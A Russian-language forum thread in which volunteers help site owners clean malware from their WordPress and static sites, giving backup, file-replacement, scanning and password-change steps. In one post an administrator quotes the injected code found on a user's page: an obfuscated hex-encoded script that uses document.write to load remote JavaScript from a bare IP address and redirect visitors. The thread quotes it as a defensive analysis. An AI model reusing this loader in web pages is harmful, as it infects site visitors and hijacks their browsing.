Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте в этой теме

akok

Команда форума
Администратор
Сообщения
16,222
Реакции
12,918
Баллы
2,203
  • Первое сообщение
  • #1
Нашим ресурсом оказываются услуги по проверке интернет ресурсов на наличие вредоносного кода.

Прошу учесть, что помощь оказывается добровольцами и поэтому не требуйте немедленной помощи. Вам обязательно окажут помощь.

Если вы хотите проверить сайт на вирусы, то выполните простые правила оформления запроса:
  1. Администрация имеет право отказать в проверке, в случае, если проверяемый ресурс нарушает законодательство или правила данного ресурса (варез, хакерская тематика, материалы порнографического характера).
  2. Никогда не публикуйте активных ссылок. (заменяйте http на хттп, например http://safezone.cc - нужно писать как хттп://safezone.cc)
  3. Не прикрепляйте файлы, которые предлагают вам скачать подозреваемые сайты. (Просто укажите имя файла, который пытается загрузится).
  4. Если Вы подозреваете, что после посещения подозрительного сайта Ваш компьютер подвергся заражению, то лучше выполнить правила оформления запроса.
*Мы не можем гарантировать 100% результат анализа. Слишком много факторов которых невозможно учесть.
 

Lunik

Активный пользователь
Сообщения
485
Реакции
109
Баллы
103
К сожалению САППОРТ не может мне предоставить доступ к админ панели, мотивируя тем, что он заражен вирусом.
Я Вам больше скажу, он в принципе не должен был этого делать. Судя по картинкам, у Вас етсь доступ до Панели управления хостингом и доя Управлением БД. В интернете есть инструкции как восстановить доступ к WP через БД,
 

raveal-2

Новый пользователь
Сообщения
13
Реакции
0
Баллы
1
Через панель своего хостинга wp-content/plugins/ я отключил все плагины (_29 шт) сайта хттп://dohodnoemecto.r путем их переименования.
Сайт по-прежнему не открывается и показывает тот код, который я показывал в своем сообщении от
26 Июн 2018
Список применяемых плагинов на сайте прилагаю
 
Последнее редактирование модератором:

Lunik

Активный пользователь
Сообщения
485
Реакции
109
Баллы
103
Для начало можно сделать резервную копию сайта, полный бэкап всех файлов и БД сохранить. Дальше восстановить резервную копию если такова имеется на момент работоспособности сайта.
После чего сменить пароли от хостинга и фтп возможно БД.

Когда копию восстановить сайт запустить, зайти в панель управления сайтом отключить или удалить плагины. Провести аудит безопасности сайта.

Так же рекомендую все таки нанять специалиста.
 

regist

гоняюсь за туманом
Ассоциация VN/VIP
VIP
Разработчик
Сообщения
12,326
Реакции
5,905
Баллы
998
@raveal-2, вам там прямым тектом пишет, что ошибка из-за файла admin-header.php
Post automatically merged:

и список плагинов лучше удалите из своего поста.
 

akok

Команда форума
Администратор
Сообщения
16,222
Реакции
12,918
Баллы
2,203
Нус приступим.

1. Делайте бекап файлов и базы данных, дабы все не поломать окончательно.
2. Подготовьте архив чистых файлов WP Русский
3. Замените файл admin-header.php, на чистый из архива (старый файл не удаляйте, а просто переименуйте). Если после замены сайт запустится, то все отлично
4. Качаете скрипт AI-Bolit - антивирус для сайта, сканер вирусов на хостинге и сайте и проверяете содержимое.
5. Смените пароли доступа к сайту и БД. Проверьте наличие левых пользователей.

Если это все сложно, лучше закажите платное лечение (у тех же revisium), а то можете окончательно все поломать.
 

raveal-2

Новый пользователь
Сообщения
13
Реакции
0
Баллы
1
Нус приступим.

1. Делайте бекап файлов и базы данных, дабы все не поломать окончательно.
2. Подготовьте архив чистых файлов WP Русский
3. Замените файл на чистый из архива (старый файл не удаляйте, а просто переименуйте). Если после замены сайт запустится, то все отлично
4. Качаете скрипт AI-Bolit - антивирус для сайта, сканер вирусов на хостинге и сайте и проверяете содержимое.
5. Смените пароли доступа к сайту и БД. Проверьте наличие левых пользователей.

Если это все сложно, лучше закажите платное лечение (у тех же revisium), а то можете окончательно все поломать.
Привет АКОК!
Я сделал бэкап, подготовил чистый архив и вставил чистый файл admin-header.php , переименовал старый файл
dmin-header.php

Теперь, если позволите, пару вопросов дилетанта:
-Мне теперь, для того чтобы проверить работу сайта опять нужно закачать на хостинг этот бэкап с чистым файлом?
-Если "да", то как это сделать? Нужно ли предварительно использовать сканер Ai-Bolit?
-Как проверить наличие левых пользователей?
Спасибо
 

akok

Команда форума
Администратор
Сообщения
16,222
Реакции
12,918
Баллы
2,203
После подготовки резервной копии, нужно было менять файл на самом хостинге, а не в бекапе. Бекап на случай "все пропало". Если сайт запустится, то воспользуйтесь Ai-Bolit, если нет. То тут только переустановка. Не забывайте о бекапе.
 

raveal-2

Новый пользователь
Сообщения
13
Реакции
0
Баллы
1
Здравствуйте.
Avast информирует о зараженной индексной странице сайта х ттр://dohodtut.ru
На остальные страницы сайта Avast не реагирует.
Например - х ттр://dohodtut.ru/index.html или х ттр://dohodtut.ru/MLM_v_%202raza.html
Как данный вирус удалить? Спасибо за ответ
 

Вложения

akok

Команда форума
Администратор
Сообщения
16,222
Реакции
12,918
Баллы
2,203
1. Главная сейчас ничего не отдает, белая страница

2. С dohodtut.ru/index.htm был редирект на start.parimatch.com

В коде
HTML:
<script type="text/javascript">var _0x2515=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0x2515[5]](_0x2515[4][_0x2515[3]](_0x2515[0])[_0x2515[2]]()[_0x2515[1]](_0x2515[0]));</script>
Описание WordPress Hacks: jQuery JS script injection :: Cybersecurity blog :: www.polaris64.net
 

raveal-2

Новый пользователь
Сообщения
13
Реакции
0
Баллы
1
@akok, Редирект можно как-то удалить?
Теперь и х ттр:// dohodtut.ru/index.htm ничего не отдает, белая страница...
Как исправить? Поможет ли предоставление кода главной страницы?
 

akok

Команда форума
Администратор
Сообщения
16,222
Реакции
12,918
Баллы
2,203
Редирект можно как-то удалить?
отредактировать страницу и убрать вставку в моем предыдущем посте.

С белой страницей, смотрите в настройки хостинга/скрипта или наймите администратора на часок.
и/или закажите лечение на стороннем сервисе (например: Вылечить сайт от вирусов.)
 
Сверху Снизу